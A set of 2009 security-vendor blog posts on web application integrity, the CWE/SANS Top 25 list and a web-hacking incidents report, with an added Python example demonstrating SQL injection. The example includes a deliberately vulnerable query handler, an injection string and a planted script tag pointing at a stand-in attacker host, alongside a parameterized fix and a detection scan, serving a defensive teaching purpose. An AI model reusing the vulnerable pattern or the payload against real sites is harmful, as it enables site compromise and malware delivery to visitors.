Submitted by Sanjay Mehta 3/11/09
Web applications are the backbone of your business! But like all backbones, if you don’t take care of them they tend to become frail, poorly performing, and vulnerable to injury over time.
Unfortunately, keeping web applications healthy and secure isn’t as simple as a daily dose of calcium. The benefits your web applications deliver can quickly unravel if their integrity is compromised. Defects in web applications can lead to lost revenue and customers, damaged reputation and brand, code leakage, and compliance violations. This isn’t to say you should give up now – instead, implement a focused program to identify the defects and vulnerabilities that lie in your web applications and take steps to remediate them.
Here are some “must do” steps to maintain the integrity and security of your web applications:
Remember simple defects can result in serious problems.
Submitted by Sanjay Mehta 1/13/2009
Sometimes the simplest mistakes can cause great harm, and if you want proof, take a look at today’s web-based business applications. On January 12, 2009, CWE & SANS announced the Top 25 Most Dangerous Programming Errors. This list, assembled by more than 30 US and international security organizations, will revolutionize the way businesses maintain their web applications’ integrity and the way people are trained to write secure code.
This priority list helps all businesses, both large and small, take better control of their application security. Many enterprise corporations I visit have a hard time keeping up with the changes in a dynamic application environment, let alone with how those changes might introduce new security vulnerabilities or application integrity concerns. But now, thanks to these industry experts, including Breach Security Labs leader Ryan Barnett, an understanding of the threat of security bugs, cyber espionage, and cyber crime has been distilled into a list of common programming errors. This makes it easier for developers to write code that mitigates or eliminates the weaknesses in business applications.
This project is another great step forward in creating a more secure Internet.
Submitted by Darryl Gordon 2/24/09
Our recently released Web Hacking Incidents Database (WHID) 2008 Annual Report found that a new type of SQL injection attack successfully compromised more than 500,000 web sites in 2008. Was your web site one of them? The report confirmed that the web application security landscape continued to evolve last year, with SQL injection attacks that plant malware on target web sites ranking as the #1 attack method used by online criminals.
For most of you, protecting your customers is of the utmost concern. Breach’s WHID report noted a shift in attack methods: in 2008 hackers focused more on a web site’s large customer base instead of targeting sensitive information within the web site’s database. This attack method turns a web site into a malware launching point for the legitimate users who visit it.
It’s simply not enough to complete the occasional code review or vulnerability scan. Today’s companies need to know where the threat or defect is, and know that they’re protected. To download a copy of the WHID report, please visit www.breach.com/2008WHID.
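The attack pattern the post describes, shown as an added example that is not code from the WHID report or from Breach Security: a review-editing handler splices a request parameter into its UPDATE statement, so a tautology in the id parameter drops the owner check and rewrites every row with an attacker-supplied script tag; beside it, the parameterized version that refuses the same input, and a scan that finds rows already carrying such a tag (the "know where the defect is" check). The table, sample rows, attacker host name and payload are all constructed for this example.

```python
"""Added example: SQL injection used to plant a script tag in every row.

Not code from the WHID report or Breach Security; the table, rows and the
attacker's host name are constructed for this illustration.
"""
import re
import sqlite3

# Hypothetical attacker payload: a script tag pointing at an attacker-run host.
INJECTED_TAG = '<script src="http://attacker.example/m.js"></script>'

# Matches external script tags of the kind planted by these attacks.
SCRIPT_RE = re.compile(r"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)

# Constructed sample rows standing in for a site's user-generated content.
SEED_ROWS = [
    (1, "alice", "Great blender, five stars."),
    (2, "bob", "Arrived late but works."),
    (3, "carol", "Would buy again."),
]


def make_db():
    """In-memory SQLite database with a reviews table and the sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE reviews (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    db.executemany("INSERT INTO reviews VALUES (?, ?, ?)", SEED_ROWS)
    db.commit()
    return db


def update_review_vulnerable(db, author, review_id, body):
    """Lets a logged-in user edit their own review, but builds the statement by
    string formatting. review_id comes straight from the request, so a value
    like "2 OR 1=1 --" comments out the author check and rewrites every row.
    Returns the number of rows updated."""
    sql = "UPDATE reviews SET body = '%s' WHERE id = %s AND author = '%s'" % (
        body, review_id, author)
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def update_review_safe(db, author, review_id, body):
    """Same operation with a parameterized query. The id is also type-checked
    before it reaches the database, so non-numeric input is rejected outright.
    This stops the injection; bodies still need HTML escaping when rendered."""
    if not str(review_id).isdigit():
        return 0
    cur = db.execute(
        "UPDATE reviews SET body = ? WHERE id = ? AND author = ?",
        (body, int(review_id), author),
    )
    db.commit()
    return cur.rowcount


def planted_script_rows(db):
    """Integrity check: ids of rows whose body carries an external script tag.
    Run it against content tables to learn whether an injection has already
    landed, rather than waiting for visitors to report the malware."""
    rows = db.execute("SELECT id, body FROM reviews ORDER BY id").fetchall()
    return [row_id for row_id, body in rows if SCRIPT_RE.search(body)]


if __name__ == "__main__":
    db = make_db()
    n = update_review_vulnerable(db, "bob", "2 OR 1=1 --", INJECTED_TAG)
    print("vulnerable handler rewrote", n, "rows; infected ids:", planted_script_rows(db))
    db = make_db()
    n = update_review_safe(db, "bob", "2 OR 1=1 --", INJECTED_TAG)
    print("safe handler rewrote", n, "rows; infected ids:", planted_script_rows(db))
```

With the vulnerable handler a single edit by "bob" lands the script tag in all three reviews, so every visitor who views any review loads the attacker's file; the parameterized handler updates nothing for the same input and still works for an honest numeric id. The scan is the part to schedule: a code review or vulnerability scan tells you whether the hole exists, while a pass over your own content tables tells you whether it has already been used.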
Submitted by Sanjay Mehta 1/6/2009
Would you jump out of a plane without a parachute? This might be a silly question for most of you (except for the one or two crazy daredevils reading this blog), but I’m assuming most of you would not leap out of a plane to almost certain death. I believe that businesses that decide to leave their web applications unprotected face the same type of risk, but instead of facing certain death they risk closing the doors of their business.
The amount of data leakage and data theft continues to soar (check out some of the latest web attacks at this website: http://www.breachblog.com) and the media has pounced on the chance to expose these attacks as they surface. As a result, businesses must tighten up their defenses, and web applications are a major hole in most security strategies. Although most businesses realize the risk of not having well-protected web applications, many still wonder whether it is worth the money to invest in web application security. The short answer is yes! But, just in case you don’t want to take just my word for it, I included a few statistics regarding the business costs associated with not protecting web applications.
The relatively small investment of protecting a business’s web applications is trivial compared to the cost of leaving them unprotected. Businesses that do suffer a web attack not only suffer immediate monetary setbacks, but their reputation and brand may be forever damaged. The good news is that the web application security industry continues to evolve and to produce new, affordable solutions to keep you ahead of the hackers. Please don’t jump out of any planes without parachutes, and please don’t leave your web applications unprotected.